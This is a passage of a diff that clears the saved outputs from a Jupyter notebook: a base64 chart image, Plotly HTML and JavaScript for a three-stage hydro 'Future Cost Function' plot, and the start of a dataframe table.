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TdFUvvt015mOfZo7Ruq372B7Va+FwlZ7/R2dVVN5me1SnPXwgPmziwuh/FS1JG3Pz1a7baH13566eaJYiz/nRz7Vona2jhefr9fVS3cWBeC1rkz5Sm3bkx338/gNPL7RK++EnIIerNGT8AmUNm2HwCqkxdufufT3VPFV5+Scl/fC/Vj7ToqOKLpeyParXfvoOcbZHddn39x7oqeap0Xer7T1UqOdadtKt775ne1TnDZ+0SH1HzVZVJKKTpy/q2ZadVPntHbZH9dLsJRs1cOy8mI+xParLfvy/uSdPX5T0w8HjX95M05miq2yP6rwf3hF+UpFItb6Yuzr6gzTZHtVlDx+IHy08r5f/2U3Xrlfqzt37ei91kFZt2CPph+eLT52/VuGqiHK2H9Ar72fG/JBNerzjQLwWlZbfVJOmbfTHVz6NsT3viCTp4NHTav5Blp58LUUdsj7X7Tv3jF8xNaby8k/qrU/66pkWHdXsXz2i35wltkf1108PxCW2R3VbXn6h3mjTR8+06Kh3Pu2v/GNnop9je1SX3b33QGl9J+mZFh3V/IOs6A/VlNge1X0jJi/W5Dlfx32c7VFdtvvACb3drp9e+3dPtWidHf0BmxLbo7rt4JHTev3DLD3ToqM+zRyjm7du/+dzbI+S2O0796LneD8926v89o4kaf6KLXqhVZqebdlJI6d8Ff1hr+U3bumjLsP1RLMUtWrbV9+cu2L4t6Bkx4E4EREREREREREREQUiDsSJiIiIiIiIiIiIKBBxIE5EREREREREREREgYgDcSIiIiIiIiIiIiIKRByIExEREREREREREVEg4kCciIiIiIiIiIiIiAIRB+JEREREREREREREFIg4ECciIiIiIiIiIiKiQMSBOBEREREREREREREFIg7EiYiIiIiIiIiIiCgQcSBORERERERERERERIGIA3EiIiIiIiIiIiIiCkQciBMRERERERERERFRIOJAnIiIiIiIiIiIiIgCEQfiRERERERERERERBSIOBAnIiIiIiIiIiIiokDEgTgRERERERERERERBSIOxImIiIgo6eXmHdXzb3ROyp/1drt+Wvz19qT8WQ+XzNeZaE2attFTzVPVrvto5eUX6snXUurl677xcW89+VqK/vZ/6fXy9YiIiIiILONAnIiIiIgeuRats9WkaZs4f3iprSTpuzt3dbSwKCl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",
- "text/html": [
- "<div> <div id=\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\" class=\"plotly-graph-div\" style=\"height:900px; width:100%;\"></div> <script type=\"text/javascript\"> require([\"plotly\"], function(Plotly) { window.PLOTLYENV=window.PLOTLYENV || {}; if (document.getElementById(\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\")) { Plotly.newPlot( \"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\", [{\"mode\":\"lines\",\"name\":\"Stage 1\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x3\",\"y\":[6725.0,7.75,-0.0],\"yaxis\":\"y3\"},{\"mode\":\"lines\",\"name\":\"Stage 2\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x2\",\"y\":[11787.5,226.93,0.62],\"yaxis\":\"y2\"},{\"mode\":\"lines\",\"name\":\"Stage 3\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x\",\"y\":[15425.0,576.31,161.68],\"yaxis\":\"y\"}], {\"height\":900,\"template\":{\"data\":{\"bar\":[{\"error_x\":{\"color\":\"#2a3f5f\"},\"error_y\":{\"color\":\"#2a3f5f\"},\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"bar\"}],\"barpolar\":[{\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"barpolar\"}],\"carpet\":[{\"aaxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"baxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"type\":\"carpet\"}],\"choropleth\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"choropleth\"}],\"contour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"contour\"}],\"contourcarpet\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"contourcarpet\"}],\"heatmap\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmap\"}],\"heatmapgl\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmapgl\"}],\"histogram\":[{\"marker\":{\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"histogram\"}],\"histogram2d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2d\"}],\"histogram2dcontour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2dcontour\"}],\"mesh3d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"mesh3d\"}],\"parcoords\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"parcoords\"}],\"pie\":[{\"automargin\":true,\"type\":\"pie\"}],\"scatter\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter\"}],\"scatter3d\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter3d\"}],\"scattercarpet\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattercarpet\"}],\"scattergeo\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergeo\"}],\"scattergl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergl\"}],\"scattermapbox\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattermapbox\"}],\"scatterpolar\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolar\"}],\"scatterpolargl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolargl\"}],\"scatterternary\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterternary\"}],\"surface\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"surface\"}],\"table\":[{\"cells\":{\"fill\":{\"color\":\"#EBF0F8\"},\"line\":{\"color\":\"white\"}},\"header\":{\"fill\":{\"color\":\"#C8D4E3\"},\"line\":{\"color\":\"white\"}},\"type\":\"table\"}]},\"layout\":{\"annotationdefaults\":{\"arrowcolor\":\"#2a3f5f\",\"arrowhead\":0,\"arrowwidth\":1},\"autotypenumbers\":\"strict\",\"coloraxis\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"colorscale\":{\"diverging\":[[0,\"#8e0152\"],[0.1,\"#c51b7d\"],[0.2,\"#de77ae\"],[0.3,\"#f1b6da\"],[0.4,\"#fde0ef\"],[0.5,\"#f7f7f7\"],[0.6,\"#e6f5d0\"],[0.7,\"#b8e186\"],[0.8,\"#7fbc41\"],[0.9,\"#4d9221\"],[1,\"#276419\"]],\"sequential\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"sequentialminus\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]]},\"colorway\":[\"#636efa\",\"#EF553B\",\"#00cc96\",\"#ab63fa\",\"#FFA15A\",\"#19d3f3\",\"#FF6692\",\"#B6E880\",\"#FF97FF\",\"#FECB52\"],\"font\":{\"color\":\"#2a3f5f\"},\"geo\":{\"bgcolor\":\"white\",\"lakecolor\":\"white\",\"landcolor\":\"#E5ECF6\",\"showlakes\":true,\"showland\":true,\"subunitcolor\":\"white\"},\"hoverlabel\":{\"align\":\"left\"},\"hovermode\":\"closest\",\"mapbox\":{\"style\":\"light\"},\"paper_bgcolor\":\"white\",\"plot_bgcolor\":\"#E5ECF6\",\"polar\":{\"angularaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"radialaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"scene\":{\"xaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"yaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"zaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"}},\"shapedefaults\":{\"line\":{\"color\":\"#2a3f5f\"}},\"ternary\":{\"aaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"baxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"caxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"title\":{\"x\":0.05},\"xaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2},\"yaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2}}},\"title\":{\"text\":\"Future Cost Function\"},\"xaxis\":{\"anchor\":\"y\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis2\":{\"anchor\":\"y2\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis3\":{\"anchor\":\"y3\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"yaxis\":{\"anchor\":\"x\",\"domain\":[0.7333333333333333,1.0],\"title\":{\"text\":\"$/MW\"}},\"yaxis2\":{\"anchor\":\"x2\",\"domain\":[0.36666666666666664,0.6333333333333333],\"title\":{\"text\":\"$/MW\"}},\"yaxis3\":{\"anchor\":\"x3\",\"domain\":[0.0,0.26666666666666666],\"title\":{\"text\":\"$/MW\"}}}, {\"responsive\": true} ).then(function(){\n",
- " \n",
- "var gd = document.getElementById('5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25');\n",
- "var x = new MutationObserver(function (mutations, observer) {{\n",
- " var display = window.getComputedStyle(gd).display;\n",
- " if (!display || display === 'none') {{\n",
- " console.log([gd, 'removed!']);\n",
- " Plotly.purge(gd);\n",
- " observer.disconnect();\n",
- " }}\n",
- "}});\n",
- "\n",
- "// Listen for the removal of the full notebook cells\n",
- "var notebookContainer = gd.closest('#notebook-container');\n",
- "if (notebookContainer) {{\n",
- " x.observe(notebookContainer, {childList: true});\n",
- "}}\n",
- "\n",
- "// Listen for the clearing of the current output cell\n",
- "var outputEl = gd.closest('.output');\n",
- "if (outputEl) {{\n",
- " x.observe(outputEl, {childList: true});\n",
- "}}\n",
- "\n",
- " }) }; }); </script> </div>"
- ]
- },
- "metadata": {},
- "output_type": "display_data"
- }
- ],
+ "outputs": [],
"source": [
"from itertools import product\n",
"import numpy as np\n",
@@ -1297,123 +270,10 @@
},
{
"cell_type": "code",
- "execution_count": 13,
+ "execution_count": null,
"id": "87285cd1-3bb7-4c72-bb43-4f2baf6e4077",
"metadata": {},
- "outputs": [
- {
- "data": {
- "text/html": [
- "<div>\n",
- "<style scoped>\n",
- " .dataframe tbody tr th:only-of-type {\n",
- " vertical-align: middle;\n",
- " }\n",
- "\n",
- " .dataframe tbody tr th {\n",
- " vertical-align: top;\n",
- " }\n",
- "\n",
- " .dataframe thead th {\n",
